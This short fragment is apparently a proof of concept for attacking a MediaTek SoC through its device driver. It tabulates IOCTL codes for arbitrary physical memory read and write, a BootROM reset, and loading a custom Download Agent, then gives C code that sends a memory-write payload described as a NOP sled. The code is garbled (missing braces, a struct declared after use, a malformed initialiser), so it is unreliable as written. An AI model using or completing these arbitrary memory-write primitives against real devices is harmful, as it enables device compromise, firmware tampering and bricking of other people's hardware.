| Command Class | IOCTL Code | Function | Danger Level | |---------------|------------|----------|---------------| | READ_MEM | 0xAAE0C | Arbitrary SoC physical memory read | High | | WRITE_MEM | 0xAAE14 | Arbitrary SoC physical memory write | Critical | | JUMP_ZERO | 0xAAE3A | Set program counter to 0x0 (BootROM reset) | Critical | | DOWNLOAD_DA | 0xAAE5F | Load custom Download Agent into SRAM | Catastrophic |
int main() HANDLE h = CreateFile(MTK_DEVICE, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); WRITE_PAYLOAD p = 0x43E00000, 0x00, 0x00, 0xA0, 0xE1 ; // NOP sled DWORD returned; DeviceIoControl(h, IOCTL_WRITE_MEM, &p, sizeof(p), NULL, 0, &returned, NULL); return 0;
typedef struct DWORD address; BYTE data[256]; WRITE_PAYLOAD;